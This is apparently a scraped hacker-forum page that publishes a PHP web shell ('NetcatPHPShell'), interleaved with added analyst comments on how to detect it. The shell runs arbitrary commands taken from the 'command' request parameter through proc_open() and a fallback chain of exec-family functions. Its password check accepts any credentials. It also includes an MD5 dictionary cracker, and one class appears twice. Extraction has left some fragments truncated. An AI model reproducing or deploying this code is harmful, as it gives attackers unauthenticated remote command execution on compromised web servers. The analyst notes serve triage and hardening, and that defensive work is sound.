Lock is Switched Off! , The shell can be accessed by anyone!



[]======================================[]
[]-----------NetcatPHPShell-------------[]
[]---------------Private----------------[]
[]======================================[]
[]   •(-• c0d3d by Mr.H4rD3n •-)•   []
[]======================================[]
[] NetcatPHPShell Released on 11/04/12  []
[]======================================[]
[]    WeLcOmE Master Of The Server !    []
[]======================================[]
[]           Moroccan Hackers           []
[]            Moroccan C0d3r            []
[]           Moroccan Masters           []
[]======================================[]
[]            MaD In MoRoCcO            []
[]======================================[]
[]                                      []
[]     Netcat PHP Connect to Server     []
[]                                      []
[]======================================[]
[]    My Groupe IsLamiC Warrior Team    []
[]======================================[]
[]    Email: exploit-id@hotmail.com     []
[]  Facebook : Facebook.com/Mr.H4rD3n   []
[]======================================[]

http://img4.imageshack.us/img4/3096/piccat.gif

// NOTE(review): the text before this point is missing from the page (presumably
// the PHP open tag and the start of HumanReadableFilesize(), which diskSpace()
// and freeSpace() call). The fragment on the next line is kept as published.
$mod; $i++) { $size /= $mod; } return round($size, 2) . ' ' . $units[$i]; }

// Analyst note: the helpers below only print host details (client and server
// address, OS string, disk size, safe-mode flag, disable_functions). A PHP file
// in a web root that reports these settings next to command-execution helpers
// is a common web-shell indicator during triage.

/**
 * Echoes the requesting client's address as PHP reports it in
 * $_SERVER['REMOTE_ADDR'].
 */
function getClientIp() {
    echo $_SERVER['REMOTE_ADDR'];
}

/**
 * Echoes the SERVER_ADDR environment value read through getenv().
 */
function getServerIp() {
    echo getenv('SERVER_ADDR');
}

/**
 * Echoes the operating-system description returned by php_uname().
 */
function getSoftwareInfo() {
    echo php_uname();
}

/**
 * Echoes the total size of the filesystem mounted at "/", formatted by
 * HumanReadableFilesize().
 */
function diskSpace() {
    echo HumanReadableFilesize(disk_total_space("/"));
}

/**
 * Echoes the free space of the filesystem mounted at "/", formatted by
 * HumanReadableFilesize().
 */
function freeSpace() {
    echo HumanReadableFilesize(disk_free_space("/"));
}

/**
 * Echoes a safe-mode status string chosen by the global $sm.
 * $sm is assigned outside this excerpt.
 */
function getSafeMode() {
    global $sm;
    echo($sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF");
}

/**
 * Echoes the value of the disable_functions ini directive, or "None" when it
 * is empty.
 *
 * Analyst note: disable_functions is the php.ini control that blocks the
 * process-spawning functions this tool depends on, which is why the tool
 * displays it.
 */
function getDisabledFunctions() {
    if(!ini_get('disable_functions')) {
        echo "None";
    }
    else {
        echo @ini_get('disable_functions');
    }
}

/**
 * Renders the mode bits of $file as a ten-character string in the style of
 * `ls -l`: one file-type character followed by owner, group and world
 * read/write/execute flags, with setuid, setgid and sticky bits folded into
 * the execute positions.
 *
 * @param string $file Path passed to fileperms().
 * @return string Permission string such as "-rw-r--r--".
 */
function getFilePermissions($file) {
    $perms = fileperms($file);

    // File type: the first matching mask wins.
    if (($perms & 0xC000) == 0xC000) {
        // Socket
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    } else {
        // Unknown
        $info = 'u';
    }

    // Owner (0x0800 is the setuid bit: 's' with execute, 'S' without)
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));

    // Group (0x0400 is the setgid bit)
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));

    // World (0x0200 is the sticky bit: 't' with execute, 'T' without)
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}

/***********************************************************/
// exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
// Turned OfF!
/**********************************************************/
/**
 * Runs $command through the first process-execution function that
 * function_exists() reports as available and returns the captured output
 * after passing it through htmlspecialchars().
 *
 * Order probed: exec, shell_exec, popen, system, passthru, proc_open. When
 * none of them exists a fixed message is returned instead.
 *
 * Analyst note: a function_exists() fallback chain over these six functions
 * is a strong static indicator of a web shell. Listing the functions in
 * php.ini's disable_functions makes function_exists() report them absent, so
 * every branch below falls through to the fixed message.
 *
 * @param string $command Command line passed unchanged to the chosen function.
 * @return string HTML-escaped command output, or the fallback message.
 */
function exec_all($command) {
    $output = '';
    if(function_exists('exec')) {
        // exec() fills $output with an array of lines; join them into one string.
        exec($command,$output);
        $output = join("\n",$output);
    }
    else if(function_exists('shell_exec')) {
        $output = shell_exec($command);
    }
    else if(function_exists('popen')) {
        $handle = popen($command , "r"); // Open the command pipe for reading
        if(is_resource($handle)) {
            // Read in 512-byte pieces with fread(), or fgets() if fread() is unavailable.
            if(function_exists('fread') && function_exists('feof')) {
                while(!feof($handle)) {
                    $output .= fread($handle, 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof')) {
                while(!feof($handle)) {
                    $output .= fgets($handle,512);
                }
            }
        }
        pclose($handle);
    }
    else if(function_exists('system')) {
        // system() prints directly, so its output is captured with output buffering.
        ob_start(); //start output buffering
        system($command);
        $output = ob_get_contents(); // Get the output
        ob_end_clean(); // Stop output buffering
    }
    else if(function_exists('passthru')) {
        ob_start(); //start output buffering
        passthru($command);
        $output = ob_get_contents(); // Get the output
        ob_end_clean(); // Stop output buffering
    }
    else if(function_exists('proc_open')) {
        $descriptorspec = array(
            1 => array("pipe", "w"), // stdout is a pipe that the child will write to
        );
        $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
        if(is_resource($handle)) {
            if(function_exists('fread') && function_exists('feof')) {
                while(!feof($pipes[1])) {
                    $output .= fread($pipes[1], 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof')) {
                while(!feof($pipes[1])) {
                    $output .= fgets($pipes[1],512);
                }
            }
        }
        pclose($handle);
    }
    else {
        $output = "They have their Security there! :( ";
    }
    return(htmlspecialchars($output));
}

/**
 * Returns $text unchanged when get_magic_quotes_gpc() reports magic quotes
 * off, otherwise returns it with stripslashes() applied.
 *
 * NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0, which helps
 * date the sample to older PHP installations.
 *
 * @param string $text Request-derived text.
 * @return string Text without the slashes added by magic quotes.
 */
function magicQuote($text) {
    if (!get_magic_quotes_gpc()) {
        return $text;
    }
    return stripslashes($text);
}

/**
 * Dictionary check of an MD5 hash: reads up to 512 bytes from the file $list,
 * splits them on newlines and compares md5() of each trimmed word with $hash.
 * Every word tried is echoed. A result string is returned when $hash is not
 * 32 characters long, when the list cannot be opened, or when a word matches;
 * if no word matches the function ends without a return value.
 *
 * NOTE(review): the string literals below span several lines and contain
 * blank lines; the page extraction appears to have stripped their HTML
 * markup. They are kept exactly as published.
 *
 * @param string $hash 32-character MD5 hex digest to look up.
 * @param string $list Path of the word list, opened with fopen().
 * @return string|null Result message, or null when no word matched.
 */
function md5Crack($hash , $list) {
    $fd = fopen($list,"r");
    if( strlen($hash) != 32 || $fd == FALSE) {
        // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
        return "

Hash or List invalid!

";
    }
    else {
        // Only the first 512 bytes of the list are read.
        $pwdList = fread($fd,512);
        $pwdList = explode("\n",$pwdList);
        echo "Words Checked :-

\n";
        foreach($pwdList as $pwd) {
            $pwd = trim($pwd);
            echo "
[*] ".$pwd;
            if(md5($pwd) == $hash ) {
                return "


\n

Hash Cracked



\n

Planintext : $pwd

";
            }
        }
    }
}
//------------------------------------------------------------------------------------------------
?>

 

// NOTE(review): the start of this listing is missing from the page. The line
// below is the tail of an array literal, presumably the $aliases table that is
// passed to outputHandle() further down. It is kept as published.
'ls -la', 'll' => 'ls -lvhF', 'dir' => 'ls' );

// Credential table: a single entry with an empty user name and an empty password.
$passwd = array('' => '');

// Error reporting is switched off for the rest of the request.
error_reporting(0);

/**
 * Session-backed command terminal served over HTTP.
 *
 * Request parameters read: `command` and `reset`.
 * Session keys written: `cwd`, `history`, `output`, `prompt`, `js_command_hist`.
 *
 * Analyst note: outputHandle() passes the `command` request parameter to
 * proc_open(), and nothing in this listing gates that call (see
 * checkPassword()). For detection, look for requests carrying `command=` to
 * an unexpected PHP file and for web-server-owned processes spawning
 * `whoami` or `uname -n` (formatPrompt()). File-integrity monitoring on the
 * web root and disabling proc_open/shell_exec in php.ini both cut this off.
 */
class phpTerm {

    /**
     * Stores a "user@host" prompt in $_SESSION['prompt'], built from the
     * output of `whoami` and the first dot-separated label of `uname -n`.
     * The empty string literals are kept as published.
     */
    function formatPrompt() {
        $user=shell_exec("whoami");
        $host=explode(".", shell_exec("uname -n"));
        $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
    }

    /**
     * Compares the HTTP Basic credentials in $_SERVER with $passwd, starts
     * the session and returns true on BOTH branches, so a mismatch is treated
     * the same as a match. The main script in this listing never calls it.
     *
     * Analyst note: this matches the page's "Lock is Switched Off" banner;
     * the tool as published has no access control.
     *
     * @param array $passwd Map of user name to password.
     * @return bool Always true.
     */
    function checkPassword($passwd) {
        if(!isset($_SERVER['PHP_AUTH_USER'])||
           !isset($_SERVER['PHP_AUTH_PW']) ||
           !isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
           $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
            @session_start();
            return true;
        }
        else {
            @session_start();
            return true;
        }
    }

    /**
     * Resets the session state when no working directory is stored yet or
     * when the request carries a non-empty `reset` parameter: the working
     * directory becomes getcwd(), history and output are cleared, and the
     * current `command` is blanked.
     */
    function initVars() {
        if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
            $_SESSION['cwd'] = getcwd();
            $_SESSION['history'] = array();
            $_SESSION['output'] = '';
            $_REQUEST['command'] ='';
        }
    }

    /**
     * Records a non-empty `command` request parameter: strips magic-quote
     * slashes if enabled, moves the command to the front of
     * $_SESSION['history'], and appends "prompt:>command" to the transcript
     * in $_SESSION['output'].
     */
    function buildCommandHistory() {
        if(!empty($_REQUEST['command'])) {
            if(get_magic_quotes_gpc()) {
                $_REQUEST['command'] = stripslashes($_REQUEST['command']);
            }

            // drop old commands from list if exists
            if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) {
                unset($_SESSION['history'][$i]);
            }
            array_unshift($_SESSION['history'], $_REQUEST['command']);

            // append the command to the transcript
            $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
        }
    }

    /**
     * Stores the history in $_SESSION['js_command_hist'] as a comma-separated
     * list of double-quoted, addslashes()-escaped strings for the page's
     * JavaScript.
     */
    function buildJavaHistory() {
        // build command history for use in the JavaScript
        if (empty($_SESSION['history'])) {
            $_SESSION['js_command_hist'] = '""';
        }
        else {
            $escaped = array_map('addslashes', $_SESSION['history']);
            $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
        }
    }

    /**
     * Handles the current `command` request parameter. A bare `cd` resets
     * the stored directory to getcwd(); `cd <path>` (path without ';') is
     * resolved and applied with chdir(); anything else is alias-expanded and
     * run with proc_open() in the stored directory. stdout and stderr are
     * appended to $_SESSION['output'] after htmlspecialchars().
     *
     * NOTE(review): ereg() was removed in PHP 7.0, so as published this
     * method only runs on PHP 5.x hosts, which helps when scoping which
     * servers could have executed it.
     *
     * @param array $aliases Map of alias token to replacement command text.
     */
    function outputHandle($aliases) {
        if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
            $_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
        }
        elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
            // The current command is 'cd', which we have to handle as an internal shell command.
            // absolute or relative path?
            ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];

            // cosmetics: collapse "/./", "//" and "dir/.." segments
            while (strpos($new_dir, '/./') !== false)
                $new_dir = str_replace('/./', '/', $new_dir);
            while (strpos($new_dir, '//') !== false)
                $new_dir = str_replace('//', '/', $new_dir);
            while (preg_match('|/\.\.(?!\.)|', $new_dir))
                $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

            if(empty($new_dir)): $new_dir = "/"; endif;

            // Keep the new directory only if chdir() accepts it.
            (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
        }
        else {
            /* The command is not a 'cd' command, so we execute it after
             * changing the directory and save the output. */
            chdir($_SESSION['cwd']);

            /* Alias expansion: replace the first whitespace-delimited token if it is a known alias. */
            $length = strcspn($_REQUEST['command'], " \t");
            $token = substr(@$_REQUEST['command'], 0, $length);
            if (isset($aliases[$token]))
                $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

            // The request parameter is handed to proc_open() as-is.
            $p = proc_open(@$_REQUEST['command'],
                array(1 => array('pipe', 'w'),
                      2 => array('pipe', 'w')),
                $io);

            /* Read output sent to stdout. */
            while (!feof($io[1])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
            }
            /* Read output sent to stderr. */
            while (!feof($io[2])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
            }

            fclose($io[1]);
            fclose($io[2]);
            proc_close($p);
        }
    }
} // end phpTerm

/*##########################################################
## The main thing starts here
## All output is XHTML
##########################################################*/
// Request flow: start the session, reset or load state, record the command,
// build the prompt once per session, then run the command. checkPassword()
// is not part of this flow.
$terminal=new phpTerm;
@session_start();
$terminal->initVars();
$terminal->buildCommandHistory();
$terminal->buildJavaHistory();
if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
$terminal->outputHandle($aliases);

header('Content-Type: text/html; charset=UTF-8');
echo '' . "\n";
?> .:: --+ NeTCaTPHPShell +-- ::. nd )'
http://img4.imageshack.us/img4/3096/piccat.gif

-------------------------------------------------------------------------------------

–•(- © Copyright Mr.H4rD3n [ All rights reserved ] -)•–

-------------------------------------------------------------------------------------

Get Commands to Server - Bypass

// NOTE(review): this listing repeats the phpTerm class printed earlier on the
// page; the visible differences are error_reporting(1) and an extra comment
// banner at the end. Its start is missing as well: the line below is the tail
// of an array literal, presumably the $aliases table passed to outputHandle().
// It is kept as published.
'ls -la', 'll' => 'ls -lvhF', 'dir' => 'ls' );

// Credential table: a single entry with an empty user name and an empty password.
$passwd = array('' => '');

// Only E_ERROR-level messages are reported (value 1).
error_reporting(1);

/**
 * Session-backed command terminal served over HTTP.
 *
 * Request parameters read: `command` and `reset`.
 * Session keys written: `cwd`, `history`, `output`, `prompt`, `js_command_hist`.
 *
 * Analyst note: outputHandle() passes the `command` request parameter to
 * proc_open(), and nothing in this listing gates that call (see
 * checkPassword()). For detection, look for requests carrying `command=` to
 * an unexpected PHP file and for web-server-owned processes spawning
 * `whoami` or `uname -n` (formatPrompt()). File-integrity monitoring on the
 * web root and disabling proc_open/shell_exec in php.ini both cut this off.
 */
class phpTerm {

    /**
     * Stores a "user@host" prompt in $_SESSION['prompt'], built from the
     * output of `whoami` and the first dot-separated label of `uname -n`.
     * The empty string literals are kept as published.
     */
    function formatPrompt() {
        $user=shell_exec("whoami");
        $host=explode(".", shell_exec("uname -n"));
        $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
    }

    /**
     * Compares the HTTP Basic credentials in $_SERVER with $passwd, starts
     * the session and returns true on BOTH branches, so a mismatch is treated
     * the same as a match. The main script in this listing never calls it.
     *
     * Analyst note: this matches the page's "Lock is Switched Off" banner;
     * the tool as published has no access control.
     *
     * @param array $passwd Map of user name to password.
     * @return bool Always true.
     */
    function checkPassword($passwd) {
        if(!isset($_SERVER['PHP_AUTH_USER'])||
           !isset($_SERVER['PHP_AUTH_PW']) ||
           !isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
           $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
            @session_start();
            return true;
        }
        else {
            @session_start();
            return true;
        }
    }

    /**
     * Resets the session state when no working directory is stored yet or
     * when the request carries a non-empty `reset` parameter: the working
     * directory becomes getcwd(), history and output are cleared, and the
     * current `command` is blanked.
     */
    function initVars() {
        if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
            $_SESSION['cwd'] = getcwd();
            $_SESSION['history'] = array();
            $_SESSION['output'] = '';
            $_REQUEST['command'] ='';
        }
    }

    /**
     * Records a non-empty `command` request parameter: strips magic-quote
     * slashes if enabled, moves the command to the front of
     * $_SESSION['history'], and appends "prompt:>command" to the transcript
     * in $_SESSION['output'].
     */
    function buildCommandHistory() {
        if(!empty($_REQUEST['command'])) {
            if(get_magic_quotes_gpc()) {
                $_REQUEST['command'] = stripslashes($_REQUEST['command']);
            }

            // drop old commands from list if exists
            if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) {
                unset($_SESSION['history'][$i]);
            }
            array_unshift($_SESSION['history'], $_REQUEST['command']);

            // append the command to the transcript
            $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
        }
    }

    /**
     * Stores the history in $_SESSION['js_command_hist'] as a comma-separated
     * list of double-quoted, addslashes()-escaped strings for the page's
     * JavaScript.
     */
    function buildJavaHistory() {
        // build command history for use in the JavaScript
        if (empty($_SESSION['history'])) {
            $_SESSION['js_command_hist'] = '""';
        }
        else {
            $escaped = array_map('addslashes', $_SESSION['history']);
            $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
        }
    }

    /**
     * Handles the current `command` request parameter. A bare `cd` resets
     * the stored directory to getcwd(); `cd <path>` (path without ';') is
     * resolved and applied with chdir(); anything else is alias-expanded and
     * run with proc_open() in the stored directory. stdout and stderr are
     * appended to $_SESSION['output'] after htmlspecialchars().
     *
     * NOTE(review): ereg() was removed in PHP 7.0, so as published this
     * method only runs on PHP 5.x hosts, which helps when scoping which
     * servers could have executed it.
     *
     * @param array $aliases Map of alias token to replacement command text.
     */
    function outputHandle($aliases) {
        if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
            $_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
        }
        elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
            // The current command is 'cd', which we have to handle as an internal shell command.
            // absolute or relative path?
            ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];

            // cosmetics: collapse "/./", "//" and "dir/.." segments
            while (strpos($new_dir, '/./') !== false)
                $new_dir = str_replace('/./', '/', $new_dir);
            while (strpos($new_dir, '//') !== false)
                $new_dir = str_replace('//', '/', $new_dir);
            while (preg_match('|/\.\.(?!\.)|', $new_dir))
                $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

            if(empty($new_dir)): $new_dir = "/"; endif;

            // Keep the new directory only if chdir() accepts it.
            (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
        }
        else {
            /* The command is not a 'cd' command, so we execute it after
             * changing the directory and save the output. */
            chdir($_SESSION['cwd']);

            /* Alias expansion: replace the first whitespace-delimited token if it is a known alias. */
            $length = strcspn($_REQUEST['command'], " \t");
            $token = substr(@$_REQUEST['command'], 0, $length);
            if (isset($aliases[$token]))
                $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

            // The request parameter is handed to proc_open() as-is.
            $p = proc_open(@$_REQUEST['command'],
                array(1 => array('pipe', 'w'),
                      2 => array('pipe', 'w')),
                $io);

            /* Read output sent to stdout. */
            while (!feof($io[1])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
            }
            /* Read output sent to stderr. */
            while (!feof($io[2])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
            }

            fclose($io[1]);
            fclose($io[2]);
            proc_close($p);
        }
    }
} // end phpTerm

/*##########################################################
## The main thing starts here
## All output is XHTML
##########################################################*/
// Request flow: start the session, reset or load state, record the command,
// build the prompt once per session, then run the command. checkPassword()
// is not part of this flow.
$terminal=new phpTerm;
@session_start();
$terminal->initVars();
$terminal->buildCommandHistory();
$terminal->buildJavaHistory();
if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
$terminal->outputHandle($aliases);

header('Content-Type: text/html; charset=UTF-8');
echo '' . "\n";
/*##########################################################
## safe mode increase
## function block (translated from the original French label)
##########################################################*/
?> \-( CMD Command )-/

POwER CoMMaNdE

X

"; ?>

Rows:

*/ ?>
PWD :

"; ?>

Rows:

*/?>
#Commanders - Private By Mr.H4rD3n - IsLamiC Warrior Team



––•(-• © Copyright Mr.H4rD3n [All rights reserved] •-)•––
My Email | Facebook :)
\m/ Greetz to : Dr-AngeL - X-Line - Ghost.0f.Morocco - xMjahd - 4chrf - KhantastiC - X internet - And yOu ! \m/
"" WE ARE MUSLIMS, WE CAN NOT HARM ANY SITE I HOPE TO USE THIS TOOL ONLY WHAT PLEASE GOD ""